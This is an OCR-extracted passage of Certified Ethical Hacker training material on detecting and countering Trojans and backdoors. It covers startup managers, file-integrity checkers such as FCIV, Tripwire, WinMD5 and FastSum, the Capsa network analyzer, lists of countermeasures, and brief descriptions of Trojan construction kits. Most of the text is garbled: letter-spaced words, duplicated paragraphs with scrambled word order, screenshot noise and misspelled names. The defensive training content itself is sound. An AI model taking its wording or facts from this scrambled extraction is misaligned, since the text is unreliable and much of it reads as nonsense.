prtS•*WV'tfrvn#
M crw oft 0 * 0* Owgnotacs $«*0‫•יוי‬
X
O«o» J a r a Cngn*
OWotSofrwft
Wtfprw
-»«W»«.SQLw»
*>07*• H" WCo~*>n
9w4\..
Xf-ogr‫!״‬Nn (t»!Co‫׳‬w NwHaotc*9w»d’,
POQOWfct
X:1^0yw■NetComien N»ef40eee^ $hsndvy*cv
H n (»M:r«ttUp«YM« * •**4 **«’
X:*o*•‫ •״‬H " 0*9V*W1 Mtw^fOQOKioyfOQ
Per<enw10»Cexmr 0U h*«
C ' ‫׳‬AW'iSo• •
Pm k j p *
W vm
HKtY.lOCAl.MACMtjr SYS
FIGURE 6.61: Security AutoRun Tool Screenshot
M o d u le 0 6 P a g e 9 7 7
Tools
©
A bsolute S tartu p m an ag e r
Program S ta rte r
http://www.absolutestartup.com
http://www.ab-tools.com
A ctiveStartup
Disable S tartu p
http://www. hexilesoft. com
http://www.disablestartup.com
StartEd Lite
CEH
S tartu p M o n ito r
http://www.outertech.com
t
a
http://www.mlin.net
t
S tartu p In spector
C ham eleon S ta rtu p M anager
http://www.windowsstartup.com
http://www.chameleon-managers.com
A utoruns for W indow s
S tartu p B ooster
1 1 1
http://www.smartpctools.com
S t a r t u p
A
P r o g r a m
list o f S t a r t u p
0
A b s o l u t e
0
A c t iv e S t a r t u p
0
S t a r t E d
L ite
0
S t a r t u p
I n s p e c t o r
0
A u t o r u n s
0
P r o g r a m
0
D is a b le
0
S t a r t u p M o n i t o r
0
C h a m e l e o n
0
S t a r t u p
M o d u le 0 6 P a g e 9 7 8
S t a r t u p
m a n a g e r
a v a il a b le
S t a r t u p
a t
t o o l s
a r e
T o o l s
a s
f o llo w s :
h t t p : / / w w w . a b s o l u t e s t a r t u p . c o m
h t t p : / / w w w . h e x i l e s o f t . c o m
h t t p : / / w w w . o u t e r t e c h . c o m
a v a ila b le
a t
h t t p : / / w w w . w i n d o w s s t a r t u p . c o m
a v a il a b le
a v a il a b le
a v a il a b le
a v a il a b le
S t a r t u p
B o o s t e r
o n i t o r i n g
a v a il a b le
a t
a t
W i n d o w s
S t a r t e r
M
p r o g r a m s ‫ ׳‬m o n i t o r i n g
a v a il a b le
f o r
s
a t
a t
h t t p : / / w w w . d i s a b l e s t a r t u p . c o m
a t
a t
h t t p : / / w w w . a b - t o o l s . c o m
M a n a g e r
a v a il a b le
a t
h t t p : / / w w w . m l i n . n e t
a v a il a b le
a t
h t t p : / / w w w . c h a m e l e o n - m a n a R e r s . c o m
h t t p : / / w w w . s m a r t p c t o o l s . c o m
Scanning for Suspicious Files
and Folders
CEH
Trojans n orm ally m o d ify system's files and folders. Use these tools to d etect system changes
T R IP W IR E
SIG V E R IF
It is an enterprise class system
integrity verifier that scans and
reports critical system files for
changes
It checks integrity of critical files
that have been digitally signed
by Microsoft
FCIV
It is a command line utility that
computes MD5 or SHA1
cryptographic hashes for files
C:\ CIV>fciv\.exe c:\hash.txt
// File Checksum Integrity Verifier
version 2.05.
‫־‬t r i p w
//
i r e .
6blfb2f76cl39c82253732elc8824cc2
C:\hash.txt
S c a n n in g
U s u a lly
c a n
s c a n
t h e
files
f o r
w h e n
a n d
a
S u s p ic io u s
s y s t e m
f o l d e r s
g e t s
w i t h
t h e
F ile s
i n f e c t e d
b y
f o ll o w i n g
a n d
a
F o ld e r s
T r o ja n ,
t o o l s
in
it
m o d i f i e s
o r d e r
t o
t h e
d e t e c t
files
t h e
a n d
f o ld e r s ;
T r o j a n s
y o u
in s t a ll e d .
F C I V
^
v
o r
Fi l e
S H A - 1
c h a n g e
h a s h
in
d a t a b a s e
X M L
file
if
I n te g r it y
f o r
f o u n d ,
d e t e r m i n e
a n d
C : \
/ /
v a l u e s
t h e m ;
t o
c o m p u t e s
a n
C h e c k s u m
v e rif ie s
files
y o u
w h i c h
V e r if ie r
t h a t
c a n
c a n
files
c r y p t o g r a p h i c
b e
r u n
a
h a v e
h a s h
(FC IV )
is a
v e rif ie d
u tility
w i t h
v e r if ic a tio n
b e e n
o f
m o d i f i e d .
v a l u e s
o f
t h a t
t h e
t h e
It
c a n
a ll o w
s t a n d a r d
file
is
a
y o u
v a l u e s
s y s t e m
t o
t o
files
g e n e r a t e
d e t e r m i n e
a g a i n s t
c o m m a n d - p r o m p t
all y o u r
c ritical
v e r s i o n
2 . 0 5 .
files
a n d
s a v e s
t h e
u tility
t h e
M D 5
a n y
X M L
t h a t
v a l u e s
in
d a t a b a s e .
C I V > f c i v \ . e x e
F i l e
C h e c k s u m
c : \ h a s h . t x t
I n t e g r i t y
V e r i f i e r
/ /
6 b l f b 2 f 7 6 c l 3 9 c 8 2 2 5 3 7 3 2 e l c 8 8 2 4 c c 2
c : \ h a s h . t x t
T r ip w ir e
—©©‫־‬
S o u r c e :
M o d u le 0 6 P a g e 9 7 9
h t t p : / / w w w . t r i p w i r e . c o m
E t h i c a l H a c k i n g a n d C o u n t e r m e a s u r e s C o p y r i g h t © b y E C - C O U I I C il
T r ip w ir e
E n t e r p r i s e
p r o a c t iv e l y
s e c u r e
r e g u l a ti o n s ,
a n d
“
t h e
t h e
e n t i r e
i n d u s t r y
i n f r a s t r u c t u r e
s t a n d a r d s
a n d
c o n t r o l
a n d
c a p a b ilitie s
e n s u r e
o r g a n i z a t i o n s
c o m p l i a n c e
w i t h
n e e d
i n te r n a l
t o
p o lic ie s ,
b e n c h m a r k s .
S IG V E R IF
S o u r c e :
S IG V E R IF
is
a
h t t p : / / b o o k s . g o o g l e . c o . i n
s i g n a t u r e
c o n n e c t e d
t o
f o l d e r
r e s t a r t
a r e
t h e
a n d
s t e p s
t h e
t o
v e r i f i c a t i o n
s y s t e m .
t h e
id e n tif y
9
C lick t h e
A d v a n c e d
0
C lick t h e
o t h e r
0
N a v i g a t e
t o
S IG V E R IF
T h e
R u n ,
t y p e
t e s t
t h a t
f in d
t h e
a n y
a ll o w s
files t h a t
in t h e
t o
u n s i g n e d
p r o g r a m
a n d
a n d
click
fin d
d r iv e r ,
s i g n e d
y o u
f u n c t i o n a l i ty
a n d
c a n
f o r
u n s i g n e d
m o v e
e r r o r s .
t h a t
t o
T h e
d r i v e r s
a
n e w
f o llo w in g
d r iv e r s :
S IG V E R IF ,
t h e n
a r e
n o t
d ig ita lly
O K .
s ig n e d .
w i n n t \ s y s t e m 3 2 \ d r i v e r s f o l d e r
f in is h e s ,
y o u
b u t t o n .
it
i n v e s t i g a t o r
s i g v e r i f . t x t
M o d u le 0 6 P a g e 9 8 0
click
t o o l
y o u
a n d
u n s i g n e d
C lick S t a r t ,
c o m p u t e r .
W h e n
s y s t e m
Q
A f t e r
in
p r o v i d e s
c h e c k s
c a n
fin d
% w i n d ir %
all
t h e
t h e
a n d
t h e n
u n s i g n e d
d r iv e r s
list o f all s i g n e d
f o ld e r ,
ty p ic a lly
t h e
click
a n d
O K .
a n d
lists
u n s i g n e d
w i n n t
o r
a r e
d r iv e r s
w i n d o w s
d i s p l a y e d
f o u n d
b y
o n
t h e
S IG V E R IF
f o ld e r .
Files and Folder Integrity
Checker: FastSum and WinMD5
W1nMD5 V2.07 (Cl 2003-2006 by eolsonS'mitedu
- I‫! ם‬
x
http://www.blisstonia.com
J
W in M D 5 is a W in dow s utility for com puting the
J
These fingerprints can be used to ensure that
M D 5 hashes ("fingerprints") o f files
th e file is u n corru pted
http://www.fastsum.com
J
FastSum is use d fo r c h e c k in g in te g rity o f th e file s
-J It c o m p u te s c h e c k su m s a c c o rd in g to th e M D 5 ch e c k su m a lg o rith m
j
F ile s
A
f o l d e r s
T h e s e
f o r
files
a n d
w o r k
O S S
a n d
a n d
a n d
c h e c k
w i t h
F o ld e r
f o l d e r
f o r
a
a n y
s u it e
G u a r d i a n
in te g r ity
c h a n g e s
o f
file
I n t e g r it y
c h e c k e r
in
s e c u r i ty
t h e
t o o l s
C h e c k e r :
a ll o w s
critical
t o
y o u
files,
p r o v i d e
F a s tS u m
t o
m o n i t o r
i n d ic a tin g
a
c o m p l e t e
a n d
t h e
in M D 5
i n t e g r i t y
p o t e n t i a l
a u d i t
W
a n d
o f
i n tr u s io n
file s
a n d
a t t e m p t s .
m o n i t o r i n g
s o lu t io n
s y s t e m s .
F a s tS u m
S o u r c e :
h t t p : / / w w w . f a s t s u m . c o m
F a s t S u m
is
o n
c h e c k i n g
t h e
y o u r
b y
s a m e
is s u e s ,
o r
files
t a k i n g
w a y ,
C D /
M o d u le 0 6 P a g e 9 8 1
t h e
in te g r ity
i m p o r t a n t
s im p ly
t h e
b u ilt
t h e
y o u
D V D
w e l l - p r o v e n
o f
t h e
n o w
files.
a n d
c h e c k
f i n g e r p r i n t s
c a n
a ls o
b u r n i n g
fin d
M D 5
Y o u
t h e
a g a in
o u t
c a n
a n d
c h e c k s u m
t a k e
i n te g r ity
y o u r
o f
a f t e r
c o m p a r i n g
w h e t h e r
a l g o r i t h m ,
c o n t r o l
files
y o u r
a
n e t w o r k
t h e m
h a d
w h i c h
d a t a
w i t h
b e e n
t h e
is
w i t h
u s e d
t r a n s f e r
o r
p r e v i o u s ly
d a m a g e d
w o r l d w i d e
F a s t S u m .
b y
a
f o r
F i n g e r p r i n t
C D
m a d e
v ir u s e s ,
b u r n i n g
o n e s .
In
n e t w o r k
f a i l u r e s .
FattSum 1.7 !Unr*g>?t«f«l]
Om
t■* !(•« ft*
X
► * Ti
O n a iiN lla vv iv ttiliM v jn M v llo vriN tta c M n B l
*«*K»j»‫*׳‬rfV‫׳‬r*JHy«c
t t e n « 9 t r of ‫• ז י ז * • ץ‬
et*ta
P m t * £ • ** Cm * 5‫ ׳‬w i r » ■w
D
D n c W 'e 'J f j T ' r . f * h «
am
*
‫׳‬.}v a tm tfv fM a
® ‫ נ‬c * * jd fc
«N I
r.0*U ~ *£ 1 » ^ D
4 ) E U > /*
U «B
D W H f5 K W 4 (‫־‬C J 4 r « W « « 5
W 3 ’w c c € ffw
1*5»«
>
V
r w v iw
“ 1 - ‫־ ■ — ־־־‬
»
Pca#11pr®
' " f • ‫!־‬
P
‫ו‬
7. « ‫י א‬
JO *
‫ מ‬4 ^ ‫ ן ז ו‬5‫ מ י ל מ מ « נ ד ז‬0 >?‫ ס‬1€«
1 3 t3 L fU 4 tU :tlW M i2 n t2 r tM 4 4 * a
2KB
4A C aaefSlS 35C S£tt37SX1«Bltft6l7
>4
‫» נו‬
• t F4J ! h: E iT fl [1:>3i
•
« «
C 3 l2 4 U 5 iA 8 8 5 tA 2 » U « 2 X 1 W H 6 *
2 C W « ^ M E F fv !r E A « 7 ? ? n R B 2 7 3
1‫ ? * ד ע‬4 ■
‫י א לי‬
‫•ו ג ד‬
U y V U 4 D U 4 . 1 M M M lS « e C « U
# ] deeeopn
IN I
31■
*A i« a & 2 X » M a E * ia )C *« 1 4 S 1 E S 1
5 H C ttO F M f D K&6E 4 D 75 & t3 £3 66 ?
\m
1«
S M p trM
& C to £ £ E 7 X &
54AS647711J
MS Ml
<? f u n
? K 1 » *a C P C lK W fiC 5 « C M E F E 7 « ll
j
C * a « M l froc«M Km I*‫ * • ״ *י‬V X I I / 10? 6 ‫ מ‬PH ♦ 4
77 Up * mD **C«nQ »* ‫ • וו‬0^‫י ׳יי‬
W * • n * ‫ ל‬W WP
UfcUrtr^♦»dwkMM :
c
D M iM M i * 1 a a r , J 0 » 7 1 49 pn
Pracwii 22H«an Otaoarv %#‫* ו‬n ■ ■31 115 6&‫א‬£
‫ מ‬oc00w«pr «»•* ec€00«Bi«r
F IG U R E
W
v 2 .0
( " f in g e r p r in ts " )
its
la r g e
F a s t S u m
in M D 5
S o u r c e :
W i n M D 5
6 .6 2 :
is
h t t p : / / w w w . b l i s s t o n i a . c o m
a
W i n d o w s
o f files.
s t o r e d
in
It a l s o
a n
d o w n l o a d a b l e
(9 8 ,
M D 5 S U M
files.
2 0 0 0 ,
m a k e s
X P,
it v e r y
file.
T h e s e
V is ta ,
e a s y
R e d H a t ,
t o
f o r
7)
u tility
c o m p a r e
f o r
t h e
e x a m p l e ,
c a n
b e
c o m p u t i n g
p r o v i d e s
u s e d
t o
t h e
M D 5
a g a i n s t
M D 5 S U M
e n s u r e
t h a t
h a s h e s
t h e
files
c o r r e c t
f o r
y o u r
all
o f
file
is
u n c o r r u p t e d .
WinMD5 v2.07 (C) 2003-2006 by [email protected]
File
Edit
O ptions
Help
Currently Processing: (idle)
Errors Found
(0 items enqueued)
P a th
| H ash
MD5SUM.md5
C hangeLog. t x t
C o rru p tF ile . t x t
README. t x t
W inMD5. e x e
Clear
| B y te s
a e c a 3 c 9 5 1 d d e a l8 3 0 e b e 7 c e b a b 5 d e 8 c c
d 7 3 ff3 9 7 a 7 6 f8 8 6 e 8 c5 a 8 0 b 0 5 2 2 3 fe el
6 3 8 9 5 2 6 4 7 7 8 b 3 c e 9 2 c 5 7 d 0 d ff6 7 0 f7 c 7
e 3 d 7 8 0 8 0 b fc 4 9 d 8 9 1 1 3 c 5 5 c f4 b 7 c4 fb 4
1 9 1 c 7 c 0 2 a3 2 0 6 fd ca2 b 7 9 9 4 1 c6 3 4 d 2 b 2
Abort
1 92
1304
92
9 78
126976
| S ta tu s
L oaded
G ood
BAD
G ood
G ood
Number of known md5 hashes found in MD5SUM files:
4
http ■
!;v.v.v.‫׳‬.bl 1sston 1a cony'software
Drag files and MD5SUM files (if available) into this window.
FIGURE 6.63: WinMD5
M o d u le 0 6 P a g e 9 8 2
Files and Folder Integrity
Checker
A dvanced C hecksum Verifier
(ACSV)
A ttrib u te M anager
http://www.miklsoft.com
http://www.irnis.net
ji
Fsum Fronted
PA File Sight
y
http://fsumfe.sourceforge.net
http://www.poweradmin.com
J
Verisys
CSP File Integrity Checker
€
http://www.ionx. co.uk
2
i
CEH
http://www.tandemsecurity. com
AFICK (A n o th er File Integrity
Checker)
p
ExactFile
http://www.exactfile.com
http://afick.sourceforge.net
I
File Integrity M onitoring
OSSEC
http://www.ncircle.com
http://www.ossec.net
^ n₪ 1|
F ile s
‫יי‬
t h e
Files
critical
c h e c k e r s
a n d
files
a r e
a n d
F o l d e r
t h a t
lis te d
0
A d v a n c e d
0
F s u m
0
V e r is y s
0
A FIC K
0
File
©
A t t r i b u t e
0
P A
0
C S P
0
E x a c tF ile
0
O S S E C
F o ld e r
I n te g r ity
i n t i m a t e
a s
( A n o t h e r
a t
M o d u le 0 6 P a g e 9 8 3
m o n i t o r
p o t e n t i a l
file
i n t r u s i o n
i n te g r ity
a t t e m p t s
A
a n d
f e w
id e n tif y
files
a n d
t h e
c h a n g e s
f o l d e r
in
i n te g r ity
File
a t
I n te g r ity
a v a il a b le
a t
a t
a t
C h e c k e r )
a v a ila b le
a v a ila b le
C h e c k e r
a v a ila b le
a v a il a b le
a t
h t t p : / / w w w . i r n i s . n e t
h t t p : / / f s u m f e . s o u r c e f o r g e . n e t
I n te g r ity
M o n i t o r i n g
M a n a g e r
(A C S V )
h t t p : / / w w w . i o n x . c o . u k
File S i g h t a v a i l a b l e
File
C h e c k e r s
V e r if ie r
a v a il a b le
a v a ila b le
I n te g r ity
a n y
C h e c k e r s
f o llo w s :
C h e c k s u m
F r o n t e d
I n t e g r it y
a t
a t
a v a il a b le
a t
h t t p : / / a f i c k . s o u r c e f o r g e . n e t
h t t p : / / w w w . n c i r c l e . c o m
h t t p : / / w w w . m i k l s o f t . c o m
h t t p : / / w w w . p o w e r a d m i n . c o m
a v a il a b le
a t
h t t p : / / w w w . t a n d e m s e c u r i t y . c o m
h t t p : / / w w w . e x a c t f i l e . c o m
h t t p : / / w w w . o s s e c . n e t
Network Activities
J
CEH
T ro ja n s c o n n e c t b a c k t o h a n d le r s a n d send c o n fid e n tia l in fo r m a t io n
t o a tta ckers
J
Use n e t w o r k sc a n n e rs a n d p a c k e t s n iffe rs t o m o n i t o r n e t w o r k
t r a f f ic g o in g t o m a lic io u s r e m o te addresses
J
R u n t o o l s s u c h as C a p s a t o m o n i t o r n e t w o r k t r a f f i c a n d l o o k f o r
s u s p ic io u s a c tiv itie s s e n t o v e r t h e w e b
S c a n n in g
A f t e r
s y s t e m
t o
a t t a c k e r s .
m a l i c i o u s
n e t w o r k s
is
b e i n g
y o u
c a n
a
t h e
m a l i c i o u s
a t t a c k e r s .
U s e
n e t w o r k
r e m o t e
f o r
S u s p ic io u s
a t t a c k ,
T r o ja n s
t r a n s f e r r e d
s u c h
t o
t h e
In
a
a n d
o r d e r
a c tiv itie s .
m a l i c i o u s
N e t w o r k
T r o ja n s
c o n n e c t
s c a n n e r s
a d d r e s s e s .
s u s p i c i o u s
id e n tif y
M o d u le 0 6 P a g e 9 8 4
f o r
W i t h
s t a r t
b a c k
t o
p a c k e t
t o
a v o id
t h e
r e m o t e
h e lp
A c t iv it ie s
s e n d i n g
t h e
c o n f i d e n t i a l
h a n d l e r s
a n d
s e n d
s n if f e r s
t h e s e
o f
s o u r c e .
t o
s c a n n i n g
B y
c o n f i d e n ti a l
m o n i t o r
s it u a ti o n s ,
u s in g
it's
u tilitie s ,
n e t w o r k
d a t a
n e t w o r k
a l w a y s
y o u
p r e s e n t
o n
t h e
tra ffic
b e t t e r
g o i n g
t o
s c a n
c a n
k n o w
if t h e
s c a n n i n g
t o o l s
like
t o
t o
t h e
d a t a
C a p s a ,
a c tiv itie s .
Detecting Trojans and Worms
with Capsa Network Analyzer
C a p s a is a n
intuitive n e tw o rk analyzer, w h ic h
th e r e a re a n y T rojan activities o n
p ro v id e s d e ta ile d
CEH
in fo rm a tio n to
h e l p c h e c k if
a n e tw o rk
h t tp : //w w w . c o la s o ft. c o m
Copyright © by EC-Coancil. All Rights Reserved. Reproduction is Strictly Prohibited.
J
D e t e c t in g
S o u r c e :
C a p s a
is
a
n e t w o r k
a c ti v it y
p a c k e t
c a p t u r i n g ,
a u t o m a t i c
a n d
W
o r m s
w it h
C a p s a
N e t w o r k
A n a ly z e r
h t t p : / / w w w . c o l a s o f t . c o m
T r o j a n
a n d
T r o ja n s
o n
a n a l y z e r
a
t h a t
n e t w o r k .
n e t w o r k
e x p e r t
It
is
p r o v i d e s
a
e n o u g h
p o r t a b l e
m o n i t o r i n g ,
n e t w o r k
a d v a n c e d
a n a l y z e r
p r o t o c o l
t o
f o r
h e lp
c h e c k
if
L A N s / W L A N s
a n a ly s is ,
i n - d e p t h
t h e r e
t h a t
p a c k e t
is
a n y
p e r f o r m s
d e c o d i n g ,
d ia g n o s is .
F e a tu re s o f C a p sa N e t w o r k A n a ly z e r in c lu d e :
©
R e a l - t im e
n e t w o r k
Q
©
c a p t u r e
a n d
w i r e l e s s
M o n i t o r
n e t w o r k
n e t w o r k
a n d
V i e w
a n d
n e t w o r k
b a n d w i d t h
p r o v id i n g
n e t w o r k
s a v e
d a t a
t r a n s m i t t e d
like
8 0 2 . 1 1 a / b / g / n
a n d
s u m m a r y
s ta tis tic s ,
a ll o w i n g
u s a g e
a n d
b y
c a p t u r i n g
d e c o d i n g
e a s y
o v e r
c a p t u r e
lo cal
d a t a
a n d
n e t w o r k s ,
p a c k e t s
a b o u t
i n t e r p r e t a t i o n
in c lu d in g
t r a n s m i t t e d
t h e s e
o f
w i r e d
o v e r
t h e
p a c k e t s
n e t w o r k
u tiliz a tio n
d a t a
e
M o n i t o r
I n t e r n e t ,
p r o d u c t i v i t y
M o d u le 0 6 P a g e 9 8 5
t o
a
e m a il,
a n d
i n s t a n t
m e s s a g i n g
tra ffic ,
h e lp i n g
k e e p
e m p l o y e e
m a x i m u m
e
e
©
D i a g n o s e
a n d
s u s p ic i o u s
h o s t s
M a p
o u t
t h e
p i n p o i n t
d e ta ils ,
a ll o w i n g
f o r
e a s y
V is u a liz e
t h e
b e t w e e n
e a c h
n e t w o r k
in c lu d in g
id e n t i f i c a t io n
e n t i r e
n e t w o r k
in
p r o b l e m s
tra ffic ,
o f
a n
in
IP a d d r e s s ,
e a c h
h o s t
e llip s e
a n d
t h a t
s e c o n d s
a n d
t h e
s h o w s
M A C ,
tra ffic
t h e
b y
d e t e c t i n g
o f e a c h
t h a t
h o s t
p a s s e s
c o n n e c t i o n s
a n d
o n
t h e
t h r o u g h
a n d
l o c a tin g
n e t w o r k ,
e a c h
tra ffic
h o s t
FIGURE 6.64: Detecting Trojans and W orms with Capsa Network Analyzer
M o d u le 0 6 P a g e 9 8 6
M
o d u l e
S o
r e s o u r c e s
c o m p u t e r .
far,
o r
w e
F l o w
h a v e
O n c e
y o u
t h a t
m in i m i z e
p r o v i d e
a n d
T r o j a n
(
! / —
V‫׳‬
o f f e r
o n
a
t h e
T r o j a n ,
p r o t e c t i o n
c o m p l e t e
v a r i o u s
T r o ja n s
c o m p u t e r ,
y o u
a g a i n s t
p r o t e c t i o n
I n f e c ti o n
o f T r o j a n s
a n d
a s
t o
t h e
t h e
w e ll
s h o u l d
T r o j a n s
C o n c e p t s
T r o j a n s
T y p e s
s t o r e d
d e t e c t
c o u n t e r m e a s u r e s
risk
d i s c u s s e d
a n d
u s e r 's
a s
w a y s
w a y s
t h e y
t o
i m m e d i a t e l y
b a c k d o o r s .
i n f e c t
d e t e c t
d e l e t e
T h e s e
t h e
s y s t e m
T r o j a n s
it
a n d
o n
a
a p p ly
s y s t e m .
C o u n t e r m e a s u r e s
|j jp |j |
A n t i - T r o j a n
P e n e t r a t i o n
S o f t w a r e
T e s t i n g
—
f
1
T r o j a n
M o d u le 0 6 P a g e 9 8 7
D e t e c t i o n
T h is
s e c t i o n
e n t e r i n g
in to
M o d u le 0 6 P a g e 9 8 8
h ig h lig h ts
y o u r
v a r i o u s
t h a t
p r e v e n t
T r o j a n s
a n d
b a c k d o o r s
f r o m
s y s t e m .
T
r
o
j
a
n
C
o
u
n
t
e
r
m
e
a
s
u
r
e
CEH
s
A v o id o pe n in g em ail
a ttach m en ts received from
u n kn ow n senders
A void a cceptin g the
program s tran sferred by
in stan t m essaging
B lock all u nnecessary ports
at the host and firew all
H arden w eak, d efa u lt
co n fig u ra tion settings
D isable unused
fu n c tio n a lity including
M o n ito r th e internal
n e tw o rk tra ffic fo r odd
ports o r en cryp ted tra ffic
protoco ls and services
T r o j a n
A
t h e s e
T r o ja n
T r o j a n s
a r e
v i c tim 's
c o m p u t e r ,
s e c r e t l y
r e p o r t i n g
c a r d
n u m b e r ,
C
is
o u n t e r m
a
m a l i c i o u s
a c t i v a t e d ,
u s e r
t h e
d a t a ,
n a m e s ,
c a r r y in g
o u t
t h e
a g a i n s t T r o ja n s ,
risk s
p r e c a r i o u s
0
A v o id
o p e n i n g
0
B lo c k
all
0
A v o id
a c c e p t i n g
0
H a r d e n
w e a k ,
0
D is a b le
u n u s e d
0
M o n i t o r
M o d u le 0 6 P a g e 9 8 9
t h e y
c o r r u p t i n g
le a d
p a s s w o r d s
t h e
in
e tc .
a t t h e
p r o g r a m s
d e f a u l t
n e t w o r k
a n d
s u c h
t o
In
a
o r d e r
h o s t
fire w a ll
t r a n s f e r r e d
g e n u i n e
e r a s i n g
p r e v e n t
b e
u n k n o w n
i n s t a n t
d a t a ,
o n
b a c k d o o r
t o
a p p l i c a t i o n .
t h e
r e p l a c in g
v i c t i m 's
o n
t h e
s u c h
d a t a
v i c tim 's
o n
s y s t e m
s u c h
a c tiv itie s
W h e n
a s
c r e d i t
s y s t e m
a n d
a
a n d
f o r
r e d u c e
a d o p t e d :
s e n d e r s
m e s s a g i n g
s e t t i n g s
in c lu d in g
tra ffic
b y
a
s e n s i t iv e
s h o u l d
f r o m
a s
s p y in g
s te a l
r e c e i v e d
a n d
a s
a n d
o p e n i n g
f u t u r e .
f u n c t i o n a l i ty
is s u e s
v ir u s e s ,
c o u n t e r m e a s u r e
a t t a c h m e n t s
p o r t s
m a n y
m a s q u e r a d e s
k e y s t r o k e s
t h e
f o ll o w i n g
e m a i l
i n te r n a l
t o
t h a t
s p r e a d i n g
r e c o r d i n g
u n n e c e s s a r y
t h e
p r o g r a m
files,
a c tiv itie s
t h e
e a s u r e s
p r o t o c o l s
f o r
o d d
a n d
p o r t s
o r
s e r v i c e s
e n c r y p t e d
tra ffic
T ro ja n C o unterm easu res
(C o n t’d)
Avoid downloading and
executing applications
from untrusted sources
Install patches and security
updates for the operating
systems and applications
Avoid typing the commands
blindly and implementing
pre-fabricated programs or
scripts
Manage local workstation
file integrity through
checksums, auditing, and
port scanning
CEH
/ .Icitifwd
ittxjJ •U.U.
Scan CDs and floppy
disks with antivirus
software before using
Run host-based antivirus,
firewall, and intrusion
detection software
C o p y r ig h t © b y EG-GOIIIICil. A ll R ights ^ g S e n /e d .;R e p ro d u c tio n is S tric tly P ro h ib ite d .
T r o ja n
C o u n te rm e a s u re s
( C o n t’d )
9
A v o id d o w n l o a d i n g a n d e x e c u t in g a p p li c a t i o n s f r o m u n t r u s t e d s o u rc e s
9
In sta ll p a tc h e s a n d s e c u r it y u p d a t e s f o r t h e o p e r a t i n g s y s te m s a n d a p p lic a t io n s
9
Scan CDs a n d f l o p p y disks w i t h a n t i v i r u s s o f t w a r e b e f o r e u sin g
9
R e s tric t p e r m is s io n s w i t h i n t h e d e s k t o p e n v i r o n m e n t t o p r e v e n t m a lic io u s a p p li c a t i o n s
i n s t a lla t io n
9
A v o id
ty p in g th e
com m ands
b li n d l y a n d
im p le m e n tin g
p re -fa b ric a te d
p ro g ra m s o r
s c r ip ts
9
M a n a g e local w o r k s t a t i o n f ile i n t e g r i t y t h r o u g h c h e c k s u m s , a u d it in g , a n d p o r t s c a n n in g
9
Run local v e rs io n s o f a n t iv ir u s , f i r e w a l l , a n d i n t r u s io n d e t e c t i o n s o f t w a r e o n t h e d e s k t o p
M o d u le 0 6 P ag e 9 9 0
Backdoor Countermeasures
CEH
U rtifM
tU x*l IlMh•(
M ost com m ercial anti-virus products can autom atically scan and detect
backdoor program s before they can cause damage
Educate users not to install applications dow nloaded from untrusted Internet
sites and em ail attachm ents
m
Use anti-virus to o ls such as W indow s Defender, M cAfee, and Norton to detect
and elim inate backdoors
C o p y rig h t © b y E G -G *ancil. A ll R ights R eserved. R e p ro d u c tio n Is S tric tly P ro h ib ite d .
B a c k d o o r C o u n te rm e a s u re s
P e rh a p s t h e o ld a d a g e " a n o u n c e o f p r e v e n t i o n is w o r t h a p o u n d o f c u r e " is r e l e v a n t
h e r e . S o m e b a c k d o o r c o u n t e r m e a s u r e s a re :
0
The firs t
lin e
o f d e fe n s e
is t o
e d u ca te
users
r e g a r d in g
th e
d a n g e rs
of
in s t a llin g
a p p li c a t i o n s d o w n l o a d e d f r o m t h e I n t e r n e t , a n d t o be c a u t io u s if t h e y h a v e t o o p e n
e m a il a t t a c h m e n t s .
0
T h e s e c o n d lin e o f d e fe n s e can be a n t i v i r u s p r o d u c t s t h a t a re c a p a b le o f r e c o g n iz in g
T r o ja n s ig n a tu r e s . T h e u p d a t e s s h o u ld be r e g u la r ly a p p lie d o v e r t h e n e t w o r k .
0
The th ird
lin e o f d e fe n s e c o m e s f r o m
k e e p in g a p p li c a t i o n v e r s io n s u p d a t e d b y t h e
f o l l o w i n g s e c u r it y p a tc h e s a n d v u l n e r a b i l i t y a n n o u n c e m e n t s .
Use a n t i v i r u s t o o l s such as W i n d o w s D e f e n d e r , M c A f e e , a n d N o r t o n t o d e t e c t a n d e l i m in a t e
b a c k d o o rs .
M o d u le 0 6 P ag e 9 91
C o n s tr u c t T ro ja n
T ro ja n E x e c u tio n
T ro ja n H orse
C o n s tr u c tio n Kits
Trojan H orse co n stru ctio n
T he to o ls in th e se kits can
kits help attackers to
be d a n g e ro u s and can
P ro g e n ic M ail T ro ja n
c o n s tru c t T rojan horses o f
b a c k fire if n o t executed
C o n s tr u c tio n Kit - P M T
th e ir ch o ice
p ro p e rly
P a n d o r a 's Box
T ro ja n H o rs e C o n s tr u c tio n Kit
411
©
©
T r o ja n
H o rs e
C o n s tr u c tio n
K its
T h e s e kits h e lp a t ta c k e r s c o n s t r u c t T r o j a n h o r s e s o f t h e i r c h o ic e . T h e t o o l s in th e s e
kits can be d a n g e r o u s a n d can b a c k fir e if n o t e x e c u t e d p r o p e r l y . S o m e o f t h e T r o ja n kits
a v a ila b le in t h e w i ld are as f o l lo w s :
9
T h e T r o j a n H o r s e C o n s t r u c t i o n K it v 2 . 0 c o n s is ts o f t h r e e EXE file s : T h c k - tc .e x e , T h c k fp .e x e , a n d T h c k - tb c .e x e . T h c k .e x e is t h e a c tu a l T r o ja n c o n s t r u c t o r . W i t h th is c o m m a n d lin e u t i li t y , t h e a t t a c k e r can c o n s t r u c t a T r o ja n h o r s e o f his o r h e r c h o ic e . T h c k - fp .e x e is a
file size m a n i p u l a t o r . W i t h th is , t h e a t t a c k e r can c r e a te file s o f a n y le n g t h , p ad o u t file s
t o a s p e c ific le n g t h , o r e v e n a p p e n d a c e r ta in n u m b e r o f b y te s t o a file . T h c k - tb c .e x e w ill
t u r n a n y C O M p r o g r a m i n t o a T im e B o m b .
9
T h e P r o g e n ic M a i l T r o j a n C o n s t r u c t i o n K it ( P M T ) is a c o m m a n d - l i n e u t i l i t y t h a t a llo w s
an a t t a c k e r t o c r e a t e an EXE ( P M .e x e ) t o se n d t o a v i c t i m .
9
P a n d o ra 's Box is a p r o g r a m d e s ig n e d t o c r e a t e T r o j a n s / t i m e b o m b s .
M o d u le 0 6 Page 9 92
M o d u le Flow
EH
P e n e tr a t io n Testin g
^
A n ti- T r o ja n
T ro ja n I n fe c tio n
S o ftw a re
**S
T ro ja n C o n c e p ts
C ou nterm e asu res
T ypes o f T ro ja n s
T ro ja n D e t e c tio n
/
C o p y rig h t © b y E G -G *ancil. A ll R ights R eserved. R e p ro d u c tio n is S tric tly P ro h ib ite d .
I M o d u le
lu §
F lo w
